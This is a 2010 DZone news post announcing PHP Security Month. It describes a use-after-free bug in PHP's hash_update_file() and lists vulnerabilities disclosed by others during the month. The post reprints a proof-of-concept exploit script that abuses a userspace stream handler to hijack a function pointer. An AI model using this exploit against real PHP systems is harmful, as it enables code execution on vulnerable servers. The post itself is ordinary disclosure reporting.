Mitch Pronschinske is a Senior Content Analyst at DZone. That means he writes and searches for the finest developer content in the land so that you don't have to. He often eats peanut butter and bananas, likes to make his own ringtones, enjoys card and board games, and is married to an underwear model. Mitch is a DZone Zone Leader and has posted 2569 posts at DZone. You can read more from them at their website. View Full User Profile

May is PHP Security Month

05.14.2010
| 5336 views |
  • submit to reddit
Did you know that May is the official Month of PHP Security?  The Month of PHP Security (MOPS) began with Stefan Esser, a PHP security specialist.  It's connected to Esser's Month of PHP Bugs, which started in 2007.  Esser and the PHP community will post submissions throughout the month that describe vulnerabilities in PHP application or the language itself.

The first post, by Esser, is about a vulnerability that was disclosed to the public three years ago during Esser's 2007 Month of PHP Bugs.  The affected versions (PHP 5.2 <= 5.2.13 and PHP 5.3 <= 5.3.2) have a vulnerable hash_update_file() function that reads data from the stream for hashing purposes, and applications can be infected with a malicious userspace stream handler that destroys the hash resource and replaces it with a customized fake resource using a modified hash function and pointer table.  The function will then call the overwritten function pointer when the internal function continues hashing in order to execute malicious code.  The following code will exploit the vulnerability and crash the normal case by triggering an attempted execution at 0x55555555:
<?php
define("OFFSET", pack("L",0x55555555));

class AttackStream {
function stream_open($path, $mode, $options, &$opened_path)
{
return true;
}

function stream_read($count)
{
hash_final($GLOBALS['hid'], true);
$GLOBALS['aaaaaaaaaaaaaaaaaaaaaa'] = str_repeat(OFFSET, 3);
return "A";
}

function stream_eof()
{
return true;
}

function stream_seek($offset, $whence)
{
return false;
}
}

stream_wrapper_register("attack", "AttackStream") or die("Failed to register protocol");

$hid = hash_init('md5');
hash_update_file($hid, "attack://nothing");
?>

To protect against this vulnerability, you'll need to implement a resource usage counter for internal functions.

Here are the other submissions that have arrived for the Month of PHP Security (so far):

PHP
  • PHP addcslashes() Interruption Information Leak Vulnerability
  • PHP dechunk Filter Signed Comparison Vulnerability
  • PHP sqlite_array_query() Uninitialized Memory Usage Vulnerability
  • PHP sqlite_single_query() Uninitialized Memory Usage Vulnerability
  • sqlite_single_query(), sqlite_array_query() Uninitialized Memory Usage
  • PHP html_entity_decode() Interruption Information Leak Vulnerability
  • PHP shm_put_var() Already Freed Resource Access Vulnerability
  • Context-aware HTML escaping
  • PHP Stream Context Use After Free on Request Shutdown Vulnerability
  • PHP fnmatch() Stack Exhaustion Vulnerability
  • PHP preg_quote() Interruption Information Leak Vulnerability
  • Generating Unpredictable Session IDs and Hashes

PHP Applications
  • ClanTiger Shoutbox Module s_email SQL Injection Vulnerability
  • ClanSphere MySQL Driver Generic SQL Injection Vulnerability
  • ClanSphere Captcha Generator Blind SQL Injection Vulnerability
  • Campsite TinyMCE Article Attachment SQL Injection Vulnerability
  • PHP ZEND_SR Opcode Interruption Address Information Leak Vulnerability
  • PHP ZEND_SL Opcode Interruption Address Information Leak Vulnerability
  • PHP ZEND_BW_XOR Opcode Interruption Address Information Leak Vulnerability
  • DeluxeBB newthread SQL Injection Vulnerability
  • Cacti Graph Viewer SQL Injection Vulnerability
  • The Minerva PHP Fuzzer
  • Xinha WYSIWYG Plugin Configuration Injection Vulnerability
  • Serendipity WYSIWYG Editor Plugin Configuration Injection Vulnerability
  • EFront ask_chat chatrooms_ID SQL Injection Vulnerability

Other
  • A New Open Source Tool: OWASP ESAPI for PHP - For writing PHP security controls
  • PHP Web Security Poster
  • How to Decode a User Space Encoded PHP Script
Tags: